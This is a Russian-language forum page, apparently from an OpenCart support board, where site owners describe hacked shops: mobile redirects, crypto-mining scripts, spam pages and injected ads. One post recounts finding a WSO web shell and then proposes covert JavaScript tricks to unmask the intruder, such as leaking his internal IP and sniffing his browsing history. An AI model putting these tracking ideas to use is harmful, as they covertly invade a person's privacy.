-
- защита
- покупатели
- (и ещё 4)
-
Добрый вечер! Кто сталкивался помогите) Взломали сайты, пока заметил на двух оба на opencart, всего Пять на хостинге. Три на opencart два на wordpress. Недавно установил новый сайт на OcStore скачивал с форума, шаблон с оф сайта разработчика TechStore. Суть проблемы, когда заходишь на сайт с телефона вылезает на новостной баннер и ведёт по ссылке на Риа новости) И эта зараза переодически пропадает и появляется снова. Кто знает как это лечить? Может кто с этим сталкивался )
-
Всем добрый день. С недавнего времени обратил внимание, что при заходе на сайт появляется всплывающее окошко: AdGuard обнаружил, что этот сайт пытается использовать ваш браузер для добычи криптовалюты. Это может создать заметную нагрузку на процессор. Нажмите "Отмена", чтобы заблокировать эту попытку. Кто то сталкивался с таким? Что это может быть? Заранее спасибо.
-
Здравствуйте, взломали ocstore 2.3+купленный шаблон, больше никаких модулей не ставил. Похерили шаблон- показывает ошибку "Error: A theme has not been assigned to this store!". Заменили мыло, логин админа и зачем-то изменили в админке адрес лога об ошибках на dark.php. Возможно сделали что-то ещё. Учётку восстановил через БД, но если шаблон поставить на дефолтный, всё равно выдает ту же ошибку. Всё сносить и ставить заново? На сайте было не очень много информации, но если такое произойдет на рабочем магазине... Во всём полностью виноват сам- не принял меры по защите.
-
Добрый день, взломали сайт давно(восстановить резервуню копию не вариант), проблему заметили не сразу Весь сервер почистили от вредоносных сайтов, нашел еще кусок кода, так же удалили но где то остался кусок этой заразы, из -за которой гугл поиск выдает иероглифы и какие то духи еще какую то фигню, и из-за этого сайт теперь не отображается при нужных запросах https://prnt.sc/ghc3am https://prnt.sc/ghc4i0 и такая проблема только с гугл поиском, на яндексе все норм, может кто знает где могут находится эти файлы и куски кода, или как исправить данную проблему. Так же этот вирус генерит кучу новых страниц, через гугл веб мастер они удаляются после индексации, при повторной индексации вылазит снова куча левых страниц 404
-
Добрый день, знатоки. Недавно обнаружил в подвале на страницах некоторых товаров текстовую рекламу. Странно, что она не на всех страницах. Как можно ее убрать?
-
Всем привет! Уже второй раз столкнулся со странной ситуацией, что БД магазина просто разваливается, или просто не удается получить к ней доступ. В логах наблюдается куча одинаковых ошибок, одинаковых запросов, которые появились в одну секунду, если смотреть по времени. Во вложении лог OpenCart. Пожалуйста, посмотрите, и подскажите, если кто сталкивался или знает что это может быть. Заранее благодарен! p.s. в логах site.ru - это мой сайт. Лог.txt
-
Добрый день, потихоньку изучаю опенкарт 1.5.6 на своей сайте. Столкнулась со странной картиной пару дней назад.В админ. панели раздел "Клиенты онлайн" отображаются Ip посетителей и адреса страниц сайта где они находятся. Всегда там были страницы моего сайта, а теперь мелькают урлы сторонних не связанных с моим по тематике разнообразных сайтов. Обратилась к хостингу на предмет попыток взлома и наличия вредоносного на сайте. Хостинг сказал все чисто. Что это такое как с этим бороться? Буду рада любым ответам и помощи. Спасибо.
- 1 ответ
-
- взлом
- чужие на сайте
- (и ещё 2)
-
Приветствую. Жаль, что название темы нельзя сменить я бы назвал ее - Ревизор) Сегодня, ко мне обратился бывший клиент с просьбой о помощи. Дело обстояло в том, что в .htaccess поставили редирект на какой-то публичный агрегатор рекламы (не арбузоустойчивый). Т.е. сначала переадресовывается на него, потом на какое-нибудь онлайн-казино. Переадресация идет только на планшетах/телефонах, тем самым забирая значительную часть аудитории сайта. Через 2-3 дня удаления кода он восстанавливается. Промежуток в 2-3 дня как-бы говорит о том, что файл переименовывается вручную, либо скрипт запускается вручную. После скачивания дампов сайта стал возможен анализ кода и access логов за неделю (что в последствии скажется). Анализ логов показал адреса запросов к "лишним" скриптам ("domain1.ru/docs/system/library/engine/1.php, domain2.ru/docs/system/library/stile.php"). При переходе к скрипту присутствует просьба ввести пароль, а значит это не просто скрипт, а шелл. После недолгой расшифровки предо мной предстал интерфейс. Шелл вполне распространенный, эргономичный и очень даже функциональный при его-то размере. Если понравился, то можете скачать называется WSO WEB Shell. Кстати после расшифровки md5 паролем оказался root После дополнительного анализа логов за неделю на всех доменах узнал, что на шелл заходят только через веб-прокси, которые расположены только у крупных хостинг-провайдеров (таймвеб, 1gb, клодо и т.д.). Это отработанная и вполне рабочая схема. Использование российских хостинг-провайдеров как бы говорит о том, что наш взломщик с территории бывшего СНГ, что есть хорошо. Если обратиться к хостинг-провайдерам с логами - ничего не даст. Ну, закроют его хостинг - зарегистрирует новый. При обилии сканов паспортов в публичном доступе можно не париться и зарегистрироваться прямо там же) В логах не видно через какую дыру он залил шеллы на сайт моего клиента, видимо прошла неделя с момента загрузки и в логах ничего нет. (Большинство хостинг-провайдеров хранят логи всего неделю) Предполагаемую дыру в не обновленном зарубежном модуле я закрыл, больше дыр не обнаружил. Зачем я все это писал, я хочу найти этого парня. Ну, или хотя бы более-менее точно составить его психологический портрет. Хочу посредством его же шелла получить максимум информации о нем. -------------------------------------- Этот параграф начну с того, что использовать php для получения информации не имеет смысла т.к. наш ревизор использует прокси. А вот javascript, который выполняется в его браузере очень даже можно. Слышал, что с помощью JS можно узнать IP адрес во внутренней сети (в NAT), только не помню где я об этом слышал. Я уже добавил авторизацию только со второго/третьего (пока не решил) раза, чтобы он ввел еще какой-нибудь пароль (хотя подумываю убрать). У него стоит хромиум или мозилла, винда 64x (из логов). Еще слышал про то, что с помощью js можно определить visited ссылка или нет. А значит можно написать страницу со списком сайтов с ссылками и прогнать его этим самым скриптом. Так можно будет узнать какие сайты посещал пользователь. Адреса сайтов нужно будет очень хорошо подобрать учитывая задачу и узкий круг интересов нашего ревизора. Что еще посоветуете?
-
Ребят выручайте, подскажите что делать? Уже 2 раза за пол часа взломали сайт на опенкарт 1.5.6.4. В этот момент находился на сайте, усиленно пользовался файловым менеджером Power Image Manager